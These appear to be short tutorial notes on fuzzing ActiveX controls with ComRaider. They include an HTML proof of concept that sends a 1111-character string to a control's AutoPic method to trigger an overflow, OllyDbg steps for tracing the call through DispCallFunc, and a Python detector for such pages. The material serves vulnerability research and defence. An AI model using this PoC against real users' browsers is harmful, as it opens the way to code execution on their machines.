Fuzzing with ComRaider
A vulnerability analysis method for ActiveX controls
PoC
<html>
<body>
<!-- instantiate the target ActiveX control by its CLSID -->
<object classid="clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF" id="target"></object>
<script>
// build a 1111-character string of 'A' and pass it as the first argument of AutoPic
var buffer = '';
while (buffer.length < 1111) buffer+="A";
target.AutoPic(buffer,"defaultV");
</script>
</body>
</html>
Attach OllyDbg (OD) to IE
ALT+E, find the OLEAUT32 module, double-click to enter it
Ctrl+N, find the function DispCallFunc, double-click to enter it
Find the first CALL ECX inside DispCallFunc and set a breakpoint on it,
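As an added example that is not part of the original notes: a Python heuristic that flags a page instantiating an ActiveX control by CLSID and then feeding a loop-grown string into one of the control's methods, which is exactly the shape of the PoC above. The sample page is the PoC embedded inline; the minimum length threshold is an assumed tuning value.

```python
import re

# Constructed sample input: the ActiveX PoC page from the notes above.
SAMPLE_HTML = """<html>
<body>
<object classid="clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF" id="target"></object>
<script>
var buffer = '';
while (buffer.length < 1111) buffer+="A";
target.AutoPic(buffer,"defaultV");
</script>
</body>
</html>"""

# <object ...> tags, and their classid / id attributes in any order
OBJECT_TAG_RE = re.compile(r'<object\b([^>]*)>', re.I)
CLSID_RE = re.compile(r'classid\s*=\s*["\']?clsid:([0-9a-f-]{36})', re.I)
ID_RE = re.compile(r'\bid\s*=\s*["\']?([\w-]+)', re.I)
# string-growing loop: while (x.length < N) x += "...";
GROW_RE = re.compile(
    r'while\s*\(\s*(\w+)\.length\s*<\s*(\d+)\s*\)\s*\1\s*\+=\s*["\']([^"\']*)["\']', re.I)


def scan_activex_page(html, min_len=256):
    """Return findings for every method call on an <object> whose argument is
    a loop-grown string of at least min_len characters (assumed threshold)."""
    objects = {}
    for attrs in OBJECT_TAG_RE.findall(html):
        clsid, oid = CLSID_RE.search(attrs), ID_RE.search(attrs)
        if clsid and oid:
            objects[oid.group(1)] = clsid.group(1).upper()
    # variable name -> length the loop grows it to
    buffers = {name: int(n) for name, n, _ in GROW_RE.findall(html)}
    findings = []
    for oid, clsid in objects.items():
        call_re = re.compile(r'\b' + re.escape(oid) + r'\.(\w+)\s*\(([^)]*)\)')
        for method, args in call_re.findall(html):
            for arg in (a.strip() for a in args.split(',')):
                if arg in buffers and buffers[arg] >= min_len:
                    findings.append({"clsid": clsid, "object_id": oid,
                                     "method": method, "arg": arg,
                                     "length": buffers[arg]})
    return findings


if __name__ == "__main__":
    for f in scan_activex_page(SAMPLE_HTML):
        print(f)
```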